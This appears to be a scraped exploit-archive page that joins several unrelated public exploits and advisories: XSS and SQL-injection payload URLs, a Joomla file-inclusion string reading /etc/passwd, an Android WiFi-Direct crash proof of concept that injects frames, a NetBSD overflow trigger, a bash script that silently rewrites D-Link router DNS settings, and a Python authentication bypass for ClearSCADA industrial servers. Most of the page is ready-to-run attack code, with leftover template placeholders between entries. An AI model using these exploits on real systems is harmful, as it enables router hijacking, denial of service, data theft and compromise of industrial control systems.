http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt> http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate ---- Sobhan system Co. Signal Network And Security Group (www.signal-net.net) E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
HireHackking

Android WiFi-Direct - Denial of Service

HACKER · %s · %s

Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Android WiFi-Direct Denial of Service 1. *Advisory Information* Title: Android WiFi-Direct Denial of Service Advisory ID: CORE-2015-0002 Advisory URL: http://www.coresecurity.com/advisories/android-wifi-direct-denial-service Date published: 2015-01-26 Date of last update: 2015-01-26 Vendors contacted: Android Security Team Release mode: User release 2. *Vulnerability Information* Class: Uncaught Exception [CWE-248] Impact: Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2014-0997 3. *Vulnerability Description* Some Android devices are affected by a Denial of Service attack when scanning for WiFi Direct devices. An attacker could send a specially crafted 802.11 Probe Response frame causing the Dalvik subsystem to reboot because of an Unhandle Exception on WiFiMonitor class. 4. *Vulnerable Packages* . Nexus 5 - Android 4.4.4 . Nexus 4 - Android 4.4.4 . LG D806 - Android 4.2.2 . Samsung SM-T310 - Android 4.2.2 . Motorola RAZR HD - Android 4.1.2 Other devices could be also affected. 5. *Non-vulnerable packages* . Android 5.0.1 . Android 5.0.2 6. *Vendor Information, Solutions and Workarounds* Some mitigation actions may be to avoid using WiFi-Direct or update to a non-vulnerable Android version. Contact vendor for further information. 7. *Credits* This vulnerability was discovered and researched by Andres Blanco from the CoreLabs Team. The publication of this advisory was coordinated by the Core Advisories Team. 8. *Technical Description / Proof of Concept Code* Android makes use of a modified *wpa_supplicant*[1] in order to provide an interface between the wireless driver and the Android platform framework. Below the function that handles *wpa_supplicant* events. This function returns a jstring from calling NewStringUTF method. /----- static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject) { char buf[EVENT_BUF_SIZE]; int nread = ::wifi_wait_for_event(buf, sizeof buf); if (nread > 0) { return env->NewStringUTF(buf); } else { return NULL; } } -----/ The WiFi-Direct specification defines the P2P discovery procedure to enable P2P devices to exchange device information, the device name is part of this information. The WifiP2pDevice class, located at /wifi/java/android/net/wifi/p2p/WifiP2pDevice.java, represents a Wi-Fi p2p device. The constructor method receives the string provided by the *wpa_supplicant* and throws an IllegalArgumentException in case the event is malformed. Below partial content of the WiFiP2PDevice.java file. /----- [...] /** Detailed device string pattern with WFD info * Example: * P2P-DEVICE-FOUND 00:18:6b:de:a3:6e p2p_dev_addr=00:18:6b:de:a3:6e * pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E' config_methods=0x188 * dev_capab=0x21 group_capab=0x9 */ private static final Pattern detailedDevicePattern = Pattern.compile( "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " + "(\\d+ )?" + "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " + "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " + "name='(.*)' " + "config_methods=(0x[0-9a-fA-F]+) " + "dev_capab=(0x[0-9a-fA-F]+) " + "group_capab=(0x[0-9a-fA-F]+)" + "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?" ); [...] /** * @param string formats supported include * P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13 * pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 dev_capab=0x27 * group_capab=0x0 wfd_dev_info=000006015d022a0032 * * P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13 * * AP-STA-CONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54] * * AP-STA-DISCONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54] * * fa:7b:7a:42:02:13 * * Note: The events formats can be looked up in the wpa_supplicant code * @hide */ public WifiP2pDevice(String string) throws IllegalArgumentException { String[] tokens = string.split("[ \n]"); Matcher match; if (tokens.length < 1) { throw new IllegalArgumentException("Malformed supplicant event"); } switch (tokens.length) { case 1: /* Just a device address */ deviceAddress = string; return; case 2: match = twoTokenPattern.matcher(string); if (!match.find()) { throw new IllegalArgumentException("Malformed supplicant event"); } deviceAddress = match.group(2); return; case 3: match = threeTokenPattern.matcher(string); if (!match.find()) { throw new IllegalArgumentException("Malformed supplicant event"); } deviceAddress = match.group(1); return; default: match = detailedDevicePattern.matcher(string); if (!match.find()) { throw new IllegalArgumentException("Malformed supplicant event"); } deviceAddress = match.group(3); primaryDeviceType = match.group(4); deviceName = match.group(5); wpsConfigMethodsSupported = parseHex(match.group(6)); deviceCapability = parseHex(match.group(7)); groupCapability = parseHex(match.group(8)); if (match.group(9) != null) { String str = match.group(10); wfdInfo = new WifiP2pWfdInfo(parseHex(str.substring(0,4)), parseHex(str.substring(4,8)), parseHex(str.substring(8,12))); } break; } if (tokens[0].startsWith("P2P-DEVICE-FOUND")) { status = AVAILABLE; } } [...] -----/ On some Android devices when processing a probe response frame with a WiFi-Direct(P2P) information element that contains a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException. As this exception is not handled the Android system restarts. Below partial content of the logcat of a Samsung SM-T310 running Android 4.2.2. /----- I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬' config_methods=0x188 dev_capab=0x21 group_capab=0x0 E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS: WifiMonitor E/AndroidRuntime( 2129): java.lang.IllegalArgumentException: Malformed supplicant event E/AndroidRuntime( 2129): at android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229) E/AndroidRuntime( 2129): at android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966) E/AndroidRuntime( 2129): at android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574) E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o /data/log/dumpstate_sys_error -----/ 8.1. *Proof of Concept* This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library. /----- #!/usr/bin/env python import sys import time import struct import PyLorcon2 def get_probe_response(source, destination, channel): frame = str() frame += "\x50\x00" # Frame Control frame += "\x00\x00" # Duration frame += destination frame += source frame += source frame += "\x00\x00" # Sequence Control frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp frame += "\x64\x00" # Beacon Interval frame += "\x30\x04" # Capabilities Information # SSID IE frame += "\x00" frame += "\x07" frame += "DIRECT-" # Supported Rates frame += "\x01" frame += "\x08" frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C" # DS Parameter Set frame += "\x03" frame += "\x01" frame += struct.pack("B", channel) # P2P frame += "\xDD" frame += "\x27" frame += "\x50\x6F\x9A" frame += "\x09" # P2P Capabilities frame += "\x02" # ID frame += "\x02\x00" # Length frame += "\x21\x00" # P2P Device Info frame += "\x0D" # ID frame += "\x1B\x00" # Length frame += source frame += "\x01\x88" frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05" frame += "\x00" frame += "\x10\x11" frame += "\x00\x06" frame += "fafa\xFA\xFA" return frame def str_to_mac(address): return "".join(map(lambda i: chr(int(i, 16)), address.split(":"))) if __name__ == "__main__": if len(sys.argv) != 3: print "Usage:" print " poc.py <iface> <target>" print "Example:" print " poc.py wlan0 00:11:22:33:44:55" sys.exit(-1) iface = sys.argv[1] destination = str_to_mac(sys.argv[2]) context = PyLorcon2.Context(iface) context.open_injmon() channel = 1 source = str_to_mac("00:11:22:33:44:55") frame = get_probe_response(source, destination, channel) print "Injecting PoC." for i in range(100): context.send_bytes(frame) time.sleep(0.100) -----/ 9. *Report Timeline* . 2014-09-26: Core Security contacts Android security team to inform them that a vulnerability has been found in Android. Core Security sends a draft advisory with technical details and PoC files. . 2014-09-29: Android Security Team acknowledges reception of the advisory. . 2014-09-30: Core Security notifies that the tentative publication date is set for Oct 20rd, 2014. . 2014-09-30: Android Security Team acknowledges. . 2014-10-16: Core Security requests a status update. . 2014-10-16: Android Security Team responds that they have classify the vulnerability as low severity and don't currently have a timeline for releasing a fix. . 2014-10-20: Core Security does not completely agrees with the vulnerability classification and reschedule the publication of the advisory. . 2014-10-16: Android Security Team acknowledges and strengthens it's position that they don't currently have a timeline for releasing a fix. . 2015-01-06: Core Security requests a status update. . 2015-01-12: Core Security asks for confirmation of reception of the previous email. . 2015-01-16: Android Security Team acknowledges and respond that they don't currently have a timeline for releasing a fix. . 2015-01-19: Core Security notifies that vendor cooperation is needed in order to keep this process coordinated. If vendor refuses to provide the requested information the advisory will be released tagged as 'user release'. The advisory is re-scheduled for January 26th, 2015. . 2015-01-20: Android Security Team acknowledges and respond that they don't currently have a timeline for releasing a fix. . 2015-01-26: The advisory CORE-2015-0002 is published. 10. *References* [1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/ [2] - Lorcon site. https://code.google.com/p/lorcon [3] - PyLorcon2 site. http://code.google.com/p/pylorcon2 11. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
HireHackking

ferretCMS 1.0.4-alpha - Multiple Vulnerabilities

HACKER · %s · %s

Advisory: Advisory ID: SROEADV-2015-10 Author: Steffen Rösemann Affected Software: ferretCMS v. 1.0.4-alpha Vendor URL: https://github.com/JRogaishio/ferretCMS Vendor Status: vendor will patch eventually CVE-ID: - Tested on: - Firefox 35, Iceweasel 31 - Mac OS X 10.10, Kali Linux 1.0.9a ========================== Vulnerability Description: ========================== The content management system ferretCMS v.1.0.4, which is currently in alpha development stage, suffers from multiple stored/reflecting XSS- and SQLi-vulnerabilities in its administrative backend. Moreover, there exists the possibility to upload arbitrary files via the administrative backend, which can be executed by unauthenticated users, too. ================== Technical Details: ================== A reflecting XSS vulnerability can be found in the parameter "action" used in the file admin.php: http:// {TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E Stored XSS vulnerabilities resides in the logging functionality of ferretCMS. On the administrative backend, the administrator has the opportunity to watch events stored in a log. An event, that gets logged, are login-attempts to the administrative backend, where the used username is displayed, too. An attacker can abuse this, by trying to log in with JavaScript-code instead of a username. That code gets executed in the logs. Login-form is located here: http://{TARGET}/admin.php XSS gets executed here: http://{TARGET}/admin.php?type=log&action=read Another stored XSS vulnerability can be found in the pagetitle of a new blog entry that is created by the administrator: vulnerable form: http://{TARGET}/admin.php?type=page&action=insert&p= XSS gets executed here: http://{TARGET}/admin.php?type=page&action=read The following URLs are prone to SQL injection attacks: http:// {TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+ http:// {TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+ http:// {TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+ http:// {TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+ http:// {TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+ http:// {TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+ http:// {TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+ Last but not least there is a file-upload functionality in the administrative backend of ferretCMS. The administrator can upload arbitrary files here via the following URL: http://localhost/ferretCMS/admin.php?type=uploader&action=upload Any unauthenticated user can execute/read those files that had been uploaded by visiting the following URL: http://{TARGET}/custom/uploads/{NAME_OF_THE_UPLOADED_FILE} ========= Solution: ========= Vendor responded, issues will be patched eventually. ==================== Disclosure Timeline: ==================== 15/16-Jan-2015 – found the vulnerability 16-Jan-2015 - informed the developers (see [3]) 16-Jan-2015 – release date of this security advisory [without technical details] 21-Jan-2015 - attempt #2 to inform the developer via mail 22-Jan-2015 - vendor responded, technical details posted to Github (see [3]) 22-Jan-2015 - release date of this security advisory 22-Jan-2015 - send to lists ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] https://github.com/JRogaishio/ferretCMS [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html [3] https://github.com/JRogaishio/ferretCMS/issues/63 [4] https://github.com/sroesemann/ferretCMS
HireHackking

D-Link DSL-2740R - Remote DNS Change

HACKER · %s · %s

#!/bin/bash # # D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit # # Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # # Description: # Different D-Link Routers are vulnerable to DNS change. # The vulnerability exist in the web interface, which is # accessible without authentication. # # ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link # DEVICES MAY AFFECTED. # # Once modified, systems use foreign DNS servers, which are # usually set up by cybercriminals. Users with vulnerable # systems or devices who try to access certain sites are # instead redirected to possibly malicious sites. # # Modifying systems' DNS settings allows cybercriminals to # perform malicious activities like: # # o Steering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # # o Replacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # # o Controlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # # o Pushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # if [[ $# -gt 3 || $# -lt 2 ]]; then echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit" echo " ================================================================" echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>" echo " Example: $0 192.168.1.1 8.8.8.8" echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" echo "" echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>" echo " http://www.ethical-hacker.org/" exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then echo " Error : libwww-perl not found =/" exit; fi GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
HireHackking

NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows

HACKER · %s · %s

// source: https://www.securityfocus.com/bid/48528/info NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library. Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition. /* 127# gcc -o grr grr.c && ./grr 6050 127# gcc -o grr grr.c && ./grr 6051 Memory fault (core dumped) 127# */ #include <stdlib.h> #include <string.h> #include <netdb.h> int main(int argc, char *argv[]){ char *cycek; cycek=malloc(atoi(argv[1])); if(!cycek) return 1; memset(cycek,'A',atoi(argv[1])); getservbyname(cycek,"tcp"); return 0; }
HireHackking

Joomla! Component com_jr_tfb - 'Controller' Local File Inclusion

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48558/info The 'com_jr_tfb' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00
HireHackking

ClearSCADA - Remote Authentication Bypass

HACKER · %s · %s

#!/usr/bin/python # cs-auby.py # ClearSCADA Remote Authentication Bypass Exploit # # Jeremy Brown # [jbrown3264/gmail] # # Oct 2010 (released Jan 2015) # # There is an authentication bypass vulnerability in ClearSCADA that can be # exploited by triggering an exception in dbserver.exe and taking advantage # of the way the program handles it. # # When an exception in occurs, ClearSCADA enters "Safe Mode". This exposes # it's diagnostic functions to remote users without requiring a valid login # as it would normally. A remote attacker could view senstive information # and possibly modify functions of the server running on the affected host. # # This code triggers an exception in dbserver.exe and checks to see if you # can then access the diagnostic page without authentication. # # Tested on ClearSCADA 2010R1 running on Windows # # Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01 # import sys import socket import httplib import urllib from time import sleep pkt_1=( "\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00" "\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00" "\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00" "\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00" "\x08\x00\x00\x00" ) pkt_2=( "\x00\x00\x00\x00" "\x26\x00\x00\x00" "\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00" "\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00" "\x74\x00\x73\x00\x00\x00" ) pkt_3=( # "Exception Occured" "\x00\x00\x00\x00\xd7\x01\x00\x00\x34\x00\x00\x00\x0d\x00\x00\x00" "\x09\x00\x00\x00\x43\x00\x50\x00\x72\x00\x6f\x00\x66\x00\x69\x00" "\x6c\x00\x65\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00" "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x46\x00\x6c\x00\x6f\x00" "\x61\x00\x74\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00" "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x55\x00\x4c\x00\x6f\x00" "\x6e\x00\x67\x00\x00\x00\x0d\x00\x00\x00\x43\x00\x50\x00\x72\x00" "\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x4c\x00\x6f\x00\x6e\x00" "\x67\x00\x00\x00\x10\x00\x00\x00\x43\x00\x41\x00\x64\x00\xBB\x00" # last w0rd "\x00\x42\x00\x49\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65" "\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41" "\x00\x64\x00\x76\x00\x42\x00\x59\x00\x54\x00\x45\x00\x56\x00\x61" "\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11" "\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x57\x00\x4f\x00\x52" "\x00\x44\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61" "\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76" "\x00\x44\x00\x49\x00\x4e\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75" "\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x12\x00\x00\x00\x43" "\x00\x41\x00\x64\x00\x76\x00\x55\x00\x44\x00\x49\x00\x4e\x00\x54" "\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70" "\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x52" "\x00\x45\x00\x41\x00\x4c\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65" "\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41" "\x00\x64\x00\x76\x00\x44\x00\x4f\x00\x55\x00\x42\x00\x4c\x00\x45" "\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70" "\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x53" "\x00\x74\x00\x72\x00\x69\x00\x6e\x00\x67\x00\x56\x00\x61\x00\x6c" "\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x0f\x00\x00" "\x00\x43\x00\x43\x00\x72\x00\x79\x00\x73\x00\x74\x00\x61\x00\x6c" "\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00\x74\x00\x00\x00\x00" ) port=5481 s_port=443 def do_ssl(target,port): try: conn = httplib.HTTPSConnection(target,port) conn._http_vsn = 10 conn._http_vsn_str = "HTTP/1.0" conn.request("GET","/diag/Info") resp = conn.getresponse() conn.close() except Exception, error: print("Error: %s" % error) return None return resp def main(): if len(sys.argv)!=2: print("Usage: %s <target>" % sys.argv[0]) sys.exit(0) target=sys.argv[1] cs=target,port print "Checking server status..." resp = do_ssl(target,s_port) if(resp == None): return if(resp.status==301): print "Server status is normal.\n" elif(resp.status==200): print "Server is already in safe mode." sys.exit(1) elif((resp.status!=301)|(resp.status!=200)): print("Server returned %d %s, server state unknown.\nContinuing anyways..\n" % (resp.status,resp.reason)) print("Sending packets to trigger exception...\n") try: sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect(cs) sock.send(pkt_1) resp_1 = sock.recv(32) sock.send(pkt_2) resp_2 = sock.recv(32) sock.send(pkt_3) resp_3 = sock.recv(32) sock.close() except Exception, error: print("Error: %s" % error) return None print("Finished, checking server status again...") sleep(1) resp = do_ssl(target,s_port) if(resp == None): return if(resp.status==301): print("Server status is still normal, maybe it's patched..\n") elif(resp.status==200): print("Server entered \"safe\" mode :)\n") print("Surf on over to https://%s:443/diag/Info to explore" % target) elif((resp.status!=301)|(resp.status!=200)): print("Server returned %d %s, server state unknown." % (resp.status,resp.reason)) if __name__ == "__main__": main()